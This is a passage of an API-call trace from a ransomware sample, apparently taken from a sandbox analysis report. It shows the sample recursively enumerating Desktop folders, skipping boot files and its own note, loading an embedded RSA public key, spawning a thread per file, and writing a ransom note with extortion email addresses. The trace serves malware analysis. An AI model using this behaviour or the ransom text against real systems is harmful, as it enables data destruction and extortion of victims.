dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e4 [0170.577] WriteFile (in: hFile=0x9e4, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0170.578] CloseHandle (hObject=0x9e4) returned 1 [0170.578] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0170.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0170.578] lstrcpyW (in: lpString1=0x17b644, lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0170.578] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0170.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.578] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.578] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0170.578] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0170.578] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0170.579] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0170.579] lstrcmpW (lpString1="ZBiOZr_ 3-6W", lpString2="..") returned 1 [0170.579] lstrcmpW (lpString1="ZBiOZr_ 3-6W", lpString2=".") returned 1 [0170.579] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0170.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0170.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0170.579] SetErrorMode (uMode=0x1) returned 0x1 [0170.579] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0170.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0170.579] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0170.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*" [0170.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0170.579] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0170.579] lstrcpyW (in: lpString1=0x17b644, lpString2="ZBiOZr_ 3-6W" | out: lpString1="ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0170.579] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.579] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.579] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.579] lstrcmpW (lpString1="UzONnSwswGOnlESVfL.mp3", lpString2="..") returned 1 [0170.579] lstrcmpW (lpString1="UzONnSwswGOnlESVfL.mp3", lpString2=".") returned 1 [0170.579] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0170.579] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="ntldr") returned 0x0 [0170.579] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="NTLDR") returned 0x0 [0170.579] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0170.579] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="ntdetect.com") returned 0x0 [0170.579] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned 55 [0170.579] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") [0170.579] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.579] lstrcpyW (in: lpString1=0x17be7c, lpString2="UzONnSwswGOnlESVfL.mp3" | out: lpString1="UzONnSwswGOnlESVfL.mp3") returned="UzONnSwswGOnlESVfL.mp3" [0170.579] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0170.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9e8 [0170.580] Sleep (dwMilliseconds=0x96) [0170.744] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.744] lstrcmpW (lpString1="xtxVVYFEc-NWjSwclj.flv", lpString2="..") returned 1 [0170.744] lstrcmpW (lpString1="xtxVVYFEc-NWjSwclj.flv", lpString2=".") returned 1 [0170.744] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0170.744] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="ntldr") returned 0x0 [0170.744] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="NTLDR") returned 0x0 [0170.744] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="NTDETECT.COM") returned 0x0 [0170.744] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="ntdetect.com") returned 0x0 [0170.744] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned 55 [0170.744] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") [0170.745] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.745] lstrcpyW (in: lpString1=0x17be7c, lpString2="xtxVVYFEc-NWjSwclj.flv" | out: lpString1="xtxVVYFEc-NWjSwclj.flv") returned="xtxVVYFEc-NWjSwclj.flv" [0170.745] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0170.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9f0 [0170.745] Sleep (dwMilliseconds=0x96) [0170.888] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0170.888] lstrcmpW (lpString1="zKa6.xls", lpString2="..") returned 1 [0170.888] lstrcmpW (lpString1="zKa6.xls", lpString2=".") returned 1 [0170.888] StrStrW (lpFirst="zKa6.xls", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0170.888] StrStrW (lpFirst="zKa6.xls", lpSrch="ntldr") returned 0x0 [0170.888] StrStrW (lpFirst="zKa6.xls", lpSrch="NTLDR") returned 0x0 [0170.888] StrStrW (lpFirst="zKa6.xls", lpSrch="NTDETECT.COM") returned 0x0 [0170.888] StrStrW (lpFirst="zKa6.xls", lpSrch="ntdetect.com") returned 0x0 [0170.888] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned 55 [0170.888] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") [0170.888] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.888] lstrcpyW (in: lpString1=0x17be7c, lpString2="zKa6.xls" | out: lpString1="zKa6.xls") returned="zKa6.xls" [0170.888] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0170.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9f8 [0170.888] Sleep (dwMilliseconds=0x96) [0171.059] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0171.059] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0171.059] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0171.059] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0171.059] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*" [0171.062] SetErrorMode (uMode=0x1) returned 0x1 [0171.062] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\_HELP_INSTRUCTION.TXT") returned 72 [0171.062] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0171.062] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0171.062] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x9fc) returned 0x0 [0171.062] RegQueryValueExW (in: hKey=0x9fc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x46a630, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x46a630*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0171.062] RegCloseKey (hKey=0x9fc) returned 0x0 [0171.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0171.062] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0171.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9fc [0171.063] WriteFile (in: hFile=0x9fc, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0171.064] CloseHandle (hObject=0x9fc) returned 1 [0171.064] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0171.064] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0171.064] lstrcpyW (in: lpString1=0x17b644, lpString2="ZBiOZr_ 3-6W" | out: lpString1="ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0171.064] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0171.064] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0171.064] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0171.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0171.064] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0171.064] lstrcmpW (lpString1="3Yo4kg3p-K", lpString2="..") returned 1 [0171.064] lstrcmpW (lpString1="3Yo4kg3p-K", lpString2=".") returned 1 [0171.065] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0171.065] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0171.065] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpString2="3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0171.065] SetErrorMode (uMode=0x1) returned 0x1 [0171.065] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0171.065] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.065] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.065] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*" [0171.065] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0171.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="3Yo4kg3p-K" [0171.065] lstrcpyW (in: lpString1=0x17a5a4, lpString2="3Yo4kg3p-K" | out: lpString1="3Yo4kg3p-K") returned="3Yo4kg3p-K" [0171.065] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0171.065] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0171.065] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0171.065] lstrcmpW (lpString1="6IAM.m4a", lpString2="..") returned 1 [0171.065] lstrcmpW (lpString1="6IAM.m4a", lpString2=".") returned 1 [0171.065] StrStrW (lpFirst="6IAM.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0171.065] StrStrW (lpFirst="6IAM.m4a", lpSrch="ntldr") returned 0x0 [0171.065] StrStrW (lpFirst="6IAM.m4a", lpSrch="NTLDR") returned 0x0 [0171.065] StrStrW (lpFirst="6IAM.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0171.065] StrStrW (lpFirst="6IAM.m4a", lpSrch="ntdetect.com") returned 0x0 [0171.065] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned 66 [0171.065] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") [0171.066] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 